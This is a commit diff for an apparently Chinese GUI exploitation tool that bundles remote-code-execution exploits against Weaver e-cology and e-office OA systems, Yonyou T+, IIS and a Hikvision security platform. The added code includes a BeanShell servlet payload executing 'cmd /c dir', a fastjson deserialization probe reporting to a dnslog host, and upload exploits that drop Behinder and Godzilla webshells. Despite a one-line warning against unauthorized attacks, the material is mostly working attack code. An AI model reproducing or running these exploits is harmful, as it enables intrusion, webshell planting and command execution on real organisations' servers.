2022-10-3

README.md

@@ -3,8 +3,9 @@
 ---
 泛微: 
 e-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes) 
-e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes) 
 e-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc) 
+e-cology BshServlet-RCE (可直接执行系统命令) 
+e-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes) 
 
 用友: 
 yongyou_chajet_rce (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64) 

src/main/java/Controller/AttController.java

@@ -74,10 +74,10 @@ void Att_clicked(MouseEvent event){ //ATT按钮
  if(getshell){
  Boolean shell_success = exploit.getshell(url, textArea_attInfo);
  if(shell_success) {
- textArea_attInfo.appendText("\n Getshell 成功 若无特别说明则默认使用冰蝎4.0.3 aes");
- }else {
- textArea_attInfo.appendText("\n shell被查杀 请进行免杀");
+ textArea_attInfo.appendText("\n--Getshell 成功 若无特别说明则默认使用冰蝎4.0.3 aes--");
  }
+
+
  }
  }
 
@@ -88,14 +88,20 @@ void Att_clicked(MouseEvent event){ //ATT按钮
  public void initialize(){
  textArea_info.setText("------------目前EXP如下-------------");
  textArea_info.appendText("\n\nOA类------------>>>>>");
- textArea_info.appendText("\n\n泛微：");
  textArea_info.appendText("\ne-cology workrelate_uploadOperation.jsp-RCE (默认写入冰蝎4.0.3aes)");
- textArea_info.appendText("\ne-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)");
  textArea_info.appendText("\ne-cology page_uploadOperation.jsp-RCE (暂未找到案例 仅供检测poc)");
- textArea_info.appendText("\n\n用友：");
- textArea_info.appendText("\nyongyou_chajet_rce (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
+ textArea_info.appendText("\ne-cology WorkflowServiceXml-RCE (shell详情见回显)");
+ textArea_info.appendText("\ne-cology BshServlet-RCE (可直接执行系统命令)");
+ textArea_info.appendText("\ne-office logo_UploadFile.php-RCE (默认写入冰蝎4.0.3aes)");
+
+ textArea_info.appendText("\n\nyongyou_chajet_rce (用友畅捷通T+ rce 默认写入哥斯拉 Cshap/Cshap_aes_base64)");
+
  textArea_info.appendText("\n\n中间件------------>>>>>");
  textArea_info.appendText("\nIIS_PUT_RCE (emm暂时没办法getshell 仅支持检测 java没有MOVE方法)");
+
+ textArea_info.appendText("\n\n安全设备------------>>>>>");
+ textArea_info.appendText("\n综合安防_applyCT_fastjson-RCE(仅支持检测,自行使用ladp服务利用)");
+
  textArea_info.appendText("\n\n------------------(禁止未授权恶意攻击)---------------");
 
  textArea_info.appendText("\n\n---------小提醒，工具所用shell为冰蝎默认aes加密生成shell" +
@@ -117,6 +123,9 @@ public void initialize(){
 
  }else if(newValue.equals("中间件")){
  listview_kinds.setItems(Kinds_Exp.middleware());
+
+ }else if(newValue.equals("安全设备")){
+ listview_kinds.setItems(Kinds_Exp.equipment());
  }
  });
  }
@@ -131,10 +140,14 @@ void listview_clicked(MouseEvent mouseEvent){
 
  }else if(listview_kinds.getSelectionModel().getSelectedItem().equals("用友-OA")){
  choiceBox_exp.setItems(Kinds_Exp.yongyouoa());
+ }
 
-
- }else if(listview_kinds.getSelectionModel().getSelectedItem().equals("IIS")){
+ else if(listview_kinds.getSelectionModel().getSelectedItem().equals("IIS")){
  choiceBox_exp.setItems(Kinds_Exp.iis());
  }
+
+ else if(listview_kinds.getSelectionModel().getSelectedItem().equals("海康")){
+ choiceBox_exp.setItems(Kinds_Exp.hik());
+ }
  }
 }

src/main/java/Controller/TsklistController.java

@@ -5,9 +5,7 @@
 import javafx.scene.control.Button;
 import javafx.scene.control.TextArea;
 import javafx.scene.input.MouseEvent;
-
 import java.io.UnsupportedEncodingException;
-import java.nio.charset.StandardCharsets;
 import java.util.HashMap;
 import java.util.Map;
 

src/main/java/Exp/OA/weaveroa/weaveroa_BshServlet.java

@@ -0,0 +1,43 @@
+package Exp.OA.weaveroa;
+
+import Utilss.HttpTools;
+import Utilss.Response;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+
+import java.util.HashMap;
+
+public class weaveroa_BshServlet implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ Boolean att = att(url,textArea);
+ return att;
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ textArea.appendText("\n 该漏洞已直接执行系统命令，无需getshell");
+ return false;
+ }
+
+ private Boolean att(String url,TextArea textArea){
+ Response response = HttpTools.get(url + "/weaver/bsh.servlet.BshServlet/", new HashMap<String, String>(), "utf-8");
+ if(response.getCode() == 200 && response.getText().contains("BeanShell Test Servlet")){
+ textArea.appendText("\n 漏洞存在 开始测试payload");
+
+ Response post = HttpTools.post(url + "/weaver/bsh.servlet.BshServlet/", "bsh.script=ex%5Cu0065c%28%22cmd+%2Fc+dir%22%29%3B"
+ , new HashMap<String, String>(),"utf-8");
+ if(post.getCode() == 200 && post.getText().contains("BeanShell Test Servlet")){
+ textArea.appendText("\n ex\\u0065c(\"cmd /c dir\"); 可用");
+ return true;
+ }else {
+ textArea.appendText("\n payload未找到 请尝试手动绕过");
+ return true;
+ }
+
+ }else {
+ textArea.appendText("\n e-cology BshServlet-RCE-漏洞不存在 (出现误报请联系作者)");
+ return false;
+ }
+ }
+}

src/main/java/Exp/OA/weaveroa/weaveroa_office_UploadFile.java

@@ -12,9 +12,6 @@ public class weaveroa_office_UploadFile implements Exploitlnterface {
  @Override
  public Boolean checkVul(String url, TextArea textArea) {
  Boolean att = att(url,shell.Testpath,textArea);
- if(!att){
- textArea.appendText("\n e-office logo_UploadFile.php-RCE - 漏洞不存在 (出现误报请联系作者)");
- }
  return att;
  }
 
@@ -24,7 +21,7 @@ public Boolean getshell(String url, TextArea textArea) {
  return att;
  }
 
- public Boolean att(String url,String Path,TextArea textArea){
+ private Boolean att(String url,String Path,TextArea textArea){
  String payload = "--e64bdf16c554bbc109cecef6451c26a4\r\n" +
  "Content-Disposition: form-data; name=\"Filedata\"; filename=\"test.php\"\r\n" +
  "Content-Type: image/jpeg\r\n" +
@@ -45,10 +42,12 @@ public Boolean att(String url,String Path,TextArea textArea){
  textArea.appendText("\n 漏洞存在 测试文件写入成功 \n 地址为："+ url + "/images/logo/logo-eoffice.php");
  return true;
  }else {
+ textArea.appendText("\n 漏洞可能存在，疑似WAF拦截，请手动复现");
  return false;
  }
 
  }else {
+ textArea.appendText("\n e-office logo_UploadFile.php-RCE - 漏洞不存在 (出现误报请联系作者)");
  return false;
  }
 

src/main/java/Exp/OA/weaveroa/weaveroa_page_uploadOperation.java

@@ -19,7 +19,7 @@ public Boolean getshell(String url, TextArea textArea) {
  return false;
  }
 
- public Boolean att(String url,String path,TextArea textArea){
+ private Boolean att(String url,String path,TextArea textArea){
  Response response = HttpTools.get(url + "/page/exportImport/uploadOperation.jsp", new HashMap<String, String>(), "utf-8");
  if(response.getCode() == 200 && !response.getText().contains("error")){
  textArea.appendText("\n 漏洞疑似存在！！请联系作者补充exp！！ weaveroa_page_uploadOperation");

src/main/java/Exp/OA/weaveroa/weaveroa_workrelate_uploadOperation.java

@@ -26,7 +26,7 @@ public Boolean getshell(String str, TextArea textArea) {
  return att;
  }
 
- public Boolean att(String url,String path,TextArea textArea,String filename){
+ private Boolean att(String url,String path,TextArea textArea,String filename){
  this.headers.put("Content-Type","multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK");
  String fir_post = "------WebKitFormBoundarymVk33liI64J7GQaK\r\n" +
  "Content-Disposition: form-data; name=\"secId\"\r\n" +
@@ -64,7 +64,7 @@ public Boolean att(String url,String path,TextArea textArea,String filename){
  "------WebKitFormBoundarymVk33liI64J7GQaK--";
 
  Response sec = HttpTools.post(url + "/OfficeServer", sec_post, this.headers, "utf-8");
- if(sec.getText().contains("9df37afc77bdd582d90aefaf4e35c63e")){
+ if(sec.getCode() == 200 && sec.getText().contains("9df37afc77bdd582d90aefaf4e35c63e")){
 
  textArea.appendText("\n 释放成功 检测写入状态");
  Response thired = HttpTools.get(url + "/" + filename, new HashMap<String, String>(), "utf-8");

src/main/java/Exp/OA/yongyou/yongyou_chajet_upload.java

@@ -22,7 +22,7 @@ public Boolean getshell(String url, TextArea textArea) {
  return att;
  }
 
- public Boolean att(String url,String path,TextArea textArea,String filename){
+ private Boolean att(String url,String path,TextArea textArea,String filename){
  this.headers.put("Content-Type","multipart/form-data; boundary=cdc420c58f599a01de22d557d538b9a4");
  String fir_post = "--cdc420c58f599a01de22d557d538b9a4\r\n" +
  "Content-Disposition: form-data; name=\"File1\"; filename=\"" + filename + "\"\r\n" +
@@ -38,16 +38,16 @@ public Boolean att(String url,String path,TextArea textArea,String filename){
  textArea.appendText("\n 漏洞存在，测试文件写入成功 \n地址为：" + url + "/tplus/SM/SetupAccount/images/" + filename);
  return true;
  }else {
- textArea.appendText("\n yongyou_chajet_upload - 漏洞不存在 (出现误报请联系作者)" + url);
+ textArea.appendText("\n yongyou_chajet_upload - 漏洞不存在 (出现误报请联系作者)");
  return false;
  }
  }else {
- textArea.appendText("\n yongyou_chajet_upload - 漏洞不存在 (出现误报请联系作者)" + url);
+ textArea.appendText("\n yongyou_chajet_upload - 漏洞不存在 (出现误报请联系作者)");
  return false;
  }
  }
 
- public Boolean attshell(String url,TextArea textArea){
+ private Boolean attshell(String url,TextArea textArea){
  HashMap<String,String> head = new HashMap<String,String>();
  head.put("Content-Type","multipart/form-data; boundary=cdc420c58f599a01de22d557d538b9a4");
 

src/main/java/Exp/equipment/HIKVISION/hik_applyCT_fastjson.java

@@ -0,0 +1,48 @@
+package Exp.equipment.HIKVISION;
+
+import Utilss.HttpTools;
+import Utilss.Response;
+import Utilss.shell;
+import core.Exploitlnterface;
+import javafx.scene.control.TextArea;
+
+import java.util.HashMap;
+
+public class hik_applyCT_fastjson implements Exploitlnterface {
+ @Override
+ public Boolean checkVul(String url, TextArea textArea) {
+ textArea.appendText("\n该漏洞使用dnslog检测 发包后延时5秒查看结果 测试时间略长(10s左右)");
+ Boolean att = att(url, textArea);
+ return att;
+ }
+
+ @Override
+ public Boolean getshell(String url, TextArea textArea) {
+ return false;
+ }
+
+ private Boolean att(String url,TextArea textArea){
+ HashMap<String, String> head = new HashMap<>();
+ head.put("Content-Type", "application/json");
+ Response dns_le1 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
+ int dns_1 = dns_le1.getText().length();
+
+ String pay_1 = "{\"a\":{\"@type\":\"com.alibaba.fastjson.JSONObject\",{\"@type\":\"java.net.URL\",\"val\":\"" +
+ shell.readFile(shell.dnspath) + "\"}}\"\"}";
+ Response post = HttpTools.post(url + "/bic/ssoService/v1/applyCT", pay_1, head, "utf-8");
+
+ try { Thread.sleep (5000) ;
+ } catch (Exception ie){}
+
+ Response dns_le2 = HttpTools.get(shell.readFile(shell.dnscofpath), new HashMap<String, String>(), "utf-8");
+ int dns_2 = dns_le2.getText().length();
+
+ if(dns_2 > dns_1){
+ textArea.appendText("\n漏洞存在-收到dnslog回显，请使用VPS自行利用");
+ return true;
+ }else {
+ textArea.appendText("\n综合安防_applyCT_fastjson-RCE-漏洞不存在 (出现误报请联系作者)");
+ return false;
+ }
+ }
+}

src/main/java/Exp/middleware/IIS/iis_put_rce.java

@@ -20,7 +20,7 @@ public Boolean getshell(String url, TextArea textArea) {
  return null;
  }
 
- public Boolean att(String url, TextArea textArea, String filePath, String uri) {
+ private Boolean att(String url, TextArea textArea, String filePath, String uri) {
  HashMap<String, String> head = new HashMap<>();
  head.put("Content-Type", "application/octet-stream");
  Response put = HttpTools.put(url + uri, shell.readFile(filePath), head, "utf-8");

src/main/java/Test.java

@@ -2,6 +2,5 @@
 public class Test {
 
  public static void main(String[] args) {
- System.out.println(System.getProperty("file.encoding"));
  }
 }

src/main/java/Utilss/HttpTools.java

@@ -62,7 +62,7 @@ public static Response post(String url, String postString, HashMap<String, Strin
  outputStream.close();
  response = getResponse(conn, encoding);
  } catch (Exception e) {
- e.printStackTrace();
+ System.out.println("连接异常");
  }
  return response;
  }

src/main/java/Utilss/Kinds_Exp.java

@@ -1,9 +1,8 @@
 package Utilss;
 
-import Exp.OA.weaveroa.weaveroa_office_UploadFile;
-import Exp.OA.weaveroa.weaveroa_page_uploadOperation;
-import Exp.OA.weaveroa.weaveroa_workrelate_uploadOperation;
+import Exp.OA.weaveroa.*;
 import Exp.OA.yongyou.yongyou_chajet_upload;
+import Exp.equipment.HIKVISION.hik_applyCT_fastjson;
 import Exp.middleware.IIS.iis_put_rce;
 import core.Exploitlnterface;
 import javafx.collections.FXCollections;
@@ -41,6 +40,14 @@ public static ObservableList<String> middleware(){
  return observableList;
  }
 
+ public static ObservableList<String> equipment(){
+ ArrayList<String> equipment = new ArrayList<>();
+ equipment.add("海康");
+ equipment.add("深信服");
+ ObservableList<String> observableList = FXCollections.observableArrayList(equipment);
+ return observableList;
+ }
+
  /*---------------------OA系列-------------------------*/
 
  //泛微oa
@@ -49,6 +56,8 @@ public static ObservableList<String> weaveroa(){
  weaveroa.add("All");
  weaveroa.add("e-cology workrelate_uploadOperation.jsp-RCE");
  weaveroa.add("e-cology page_uploadOperation.jsp-RCE");
+ weaveroa.add("e-cology WorkflowServiceXml-RCE");
+ weaveroa.add("e-cology BshServlet-RCE");
  weaveroa.add("e-office logo_UploadFile.php-RCE");
  ObservableList<String> observableList = FXCollections.observableArrayList(weaveroa);
  return observableList;
@@ -83,27 +92,54 @@ public static ObservableList<String> iis(){
  }
 
 
+ /*---------------------安全设备-------------------------*/
+
+ //海康
+ public static ObservableList<String> hik(){
+ ArrayList<String> hik = new ArrayList<>();
+ hik.add("All");
+ hik.add("综合安防_applyCT_fastjson-RCE");
+ ObservableList<String> observableList = FXCollections.observableArrayList(hik);
+ return observableList;
+ }
+
+
  //根据选择的Exp返回对应的对象
  public static Exploitlnterface getExploit(String vulName){
  Exploitlnterface ei = null;
+ /*-----OA-----*/
  if(vulName.contains("workrelate_uploadOperation")){
+ //泛微
  ei = new weaveroa_workrelate_uploadOperation();
  }else if(vulName.contains("page_uploadOperation")){
  ei = new weaveroa_page_uploadOperation();
  }else if(vulName.contains("logo_UploadFile.php")){
  ei = new weaveroa_office_UploadFile();
+ }else if(vulName.contains("e-cology BshServlet-RCE")){
+ ei = new weaveroa_BshServlet();
+ }else if(vulName.contains("e-cology WorkflowServiceXml-RCE")){
+ ei = new weaveroa_WorkflowServiceXml();
  }
 
  else if(vulName.contains("chajet_upload")){
+ //用友
  ei = new yongyou_chajet_upload();
  }
 
 
  /*-----中间件-----*/
  else if(vulName.contains("iis_put_rce")){
+ //IIS
  ei = new iis_put_rce();
  }
 
+ /*-----安全设备-----*/
+ else if(vulName.contains("applyCT_fastjson-RCE")){
+ //海康
+ ei = new hik_applyCT_fastjson();
+ }
+
+
  return ei;
  }
 }